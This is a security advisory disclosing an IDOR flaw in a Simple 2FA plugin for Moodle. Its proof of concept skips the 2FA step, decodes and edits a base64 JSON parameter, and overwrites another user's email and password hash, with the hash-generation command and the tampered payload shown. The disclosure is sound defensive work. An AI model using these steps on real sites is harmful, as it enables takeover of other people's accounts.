A Insecure direct object references (IDOR) vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor
Vulnerability Details
Risk : Critical
Vendor: LMS Doctor - Simple 2 Factor Authentication Plugin For Moodle
Disclosed by: Flaviu Popescu
Description: Insecure direct object references (IDOR) vulnerability in The Simple 2FA Plugin for Moodle by "LMS Doctor". Allows remote attackers to update sensitive records such as email, password and phone number of other user accounts.
Proof of concept:
Initial login process using a self-registered account (dionach.tester):
POST /login/index.php
Once the 2FA prompt is shown, the attacker force browses to the following URL instead of providing the 2FA code.
POST /auth/simple2fa/profile.php
This request is captured in Burp Suite:
The parameter "u" contains a base64 encoded string. The string is decoded, which reveals data in JSON format as shown below:
The attacker tampers with the JSON data, modifying the id, e-mail, password, and the name. The JSON data is encoded back into base64, updated in Burp Suite, and forwarded to the server.
New hash generation for the password:
$ htpasswd -bnBC 10 "" pwn3d! | tr -d ':\n'\n
$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy Snipped of tampered data:
{"id":"8045","auth":"email","confirmed":"1","policyagreed":"0","deleted":"0","suspended":"0","mnethostid":"1","username":"dionach.tester2","password":"$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy","idnumber":"","firstname":"Dio","lastname":"Nach","email":"flaviu.popescu+1337@[..]", [..]Resulting in the victim's account, id 8045 (dionach.tester2) being updated as shown below:
